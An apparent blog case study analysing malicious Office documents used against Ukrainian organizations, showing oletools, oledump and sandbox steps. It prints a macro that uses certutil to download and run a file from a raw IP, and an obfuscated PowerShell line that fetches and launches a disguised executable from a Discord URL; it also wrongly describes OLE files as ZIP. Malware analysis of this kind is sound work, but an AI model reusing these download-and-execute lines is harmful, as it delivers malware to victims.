How to analyze malicious documents — Case study
We will be doing analysis on Microsoft documents used in real life attacks. The document is a .docx file that was used to attack Ukrainian…
We will be doing analysis on Microsoft documents used in real life attacks. The document is a .docx file that was used to attack Ukrainian organizations in the context of the military conflict between Russia and Ukraine.
Tools Used:
- oleid
- exiftool
- olevba
- Oledump
- AnyRun
Introduction
Types of Microsoft Office File Formats
When collecting files that could be related to an incident, you might notice that many files contain various extensions (.txt, .dotm, .zip, .docx, .pdf) which belong to different applications. For the purpose of this blog, we will focus on the three main types of file formats in Microsoft Office: Word, Excel, and PowerPoint. First, let’s explain the structure of these files and how they differ from one another. [1]
Object Linking and Embedding (OLE)
OLE2 format was used in Microsoft Word 97–2003 documents and other Microsoft products such as Outlook messages. The well-known file extensions .doc, .xls and .ppt are all file types based on the OLE format. An OLE file is a compound file and it is structured as a file system within a file. OLE files are formatted as ZIP and the contents of the file can be viewed using oledir utility (this is part of oletools which will be explained later in this post). The OLE file contains:
- Streams of data where each stream has a name. A file must contain at least one stream. For example, for Word documents, it is mandatory to contain a stream called WordDocument, which is the main stream that contains the document text.
- Storages that contain streams or other storages.
- Properties that are streams containing information about the document, such as author, title, creation, and modification date. Property streams always start with x05.
Office Open XML (OOXML)
This file format was incorporated into Microsoft Office 2007. It is a zipped XML-based format developed by Microsoft and used for all Microsoft Office files. The associated extensions include .docx, .xlsx and .pptx. OOXML files are structured in a similar way to OLE files but there are several differences between them:
- Each directory in the OOXML file contains a .xml file that can be seen in the screenshot below.
- A file called [Content_Types].xml must be in the root directory of the archive. It contains all of the content types included in the archive.
- OOXML files cannot contain VBA macros (we will elaborate on this in the next section).
- OOXML files contain any objects including images, OLE objects[1], PE files, media files, and more.
- Relationships between objects are described in the files with .rels extension.
Technical analysis
Part 1
Malicious Document Sample: https://bazaar.abuse.ch/sample/c2672e6fd55b129125a19c7837943c0844c03ec02dcf165af183f9e4df4dccbc/
let’s use exiftool to see the metadata:
The oleid tool is used to determine if the file contains any macros:
The olevba tool is utilized to obtain more information about the VBA macros found:
As we can see above, the tool detected a malicious macro that will run when macros are enabled.
Oledump is a program to analyze OLE files:
VBScript code (python oledump/oledump.py malware.xlsm -s A4 -v):Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
PID = Shell("cmd /c certutil.exe -urlcache -split -f ""http://3.112.243.28/net/Ugrfa.bat"" Opcbuyjhg.exe.exe && Opcbuyjhg.exe.exe", vbHide)
End Sub
The certutil.exe legitimate executable is used to download a malicious binary (Ugrfa.bat) from a remote server and run it.
ViperMonkey is a VBA Emulation engine that can be used to analyze and deobfuscate malicious VBA macros.
The tool was able to detect the entry point function (workbook_open) and the routine responsible for downloading a malicious executable.
Part 2
Malicious file: https://bazaar.abuse.ch/sample/992df82cf31a91acd034411bb43a1ec127fa15d613b108287384882807f81764/#iocs
exiftool analysis:
oleid analysis:
Oleid is used to investigate the file, which doesn’t contain any VBA macros.
oledump can be used to find the objects embedded:
The 7z tool is used to decompress the file.
after that, we can verify the object by outputting the resource section.
Let’s run this on anyrun and interact with the object there.
"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\GSU207@POLICE.GOV.UA - Повідомлення (15).js""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [NeT.seRvIcepOiNtmanAgER]::sECURITyPROToCOL = [neT.SEcurITypRotOcoLType]::Tls12 ; Irm -uRI (”https://c” + ”dn.discordapp.com/attachme” + ”nts/932413459872747544/93829197773526634” + ”4/p” + ”utty.ex” + ”e” ) -outfilE ”$enV:PuBLICGoogleChromeUpdate.exe” ; sTArt-pRoceSs ”$eNV:pUBLIcGoogleChromeUpdate.exe”
we need to look at the .js file now
Apparently the .js is calling the powershell."C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [NeT.seRvIcepOiNtmanAgER]::sECURITyPROToCOL = [neT.SEcurITypRotOcoLType]::Tls12 ; Irm -uRI (”https://c” + ”dn.discordapp.com/attachme” + ”nts/932413459872747544/93829197773526634” + ”4/p” + ”utty.ex” + ”e” ) -outfilE ”$enV:PuBLICGoogleChromeUpdate.exe” ; sTArt-pRoceSs ”$eNV:pUBLIcGoogleChromeUpdate.exe”
The powershell is downloading the .exe and executing it.
Please give a clap if you found it to be useful and follow me to get more hacking knowledge.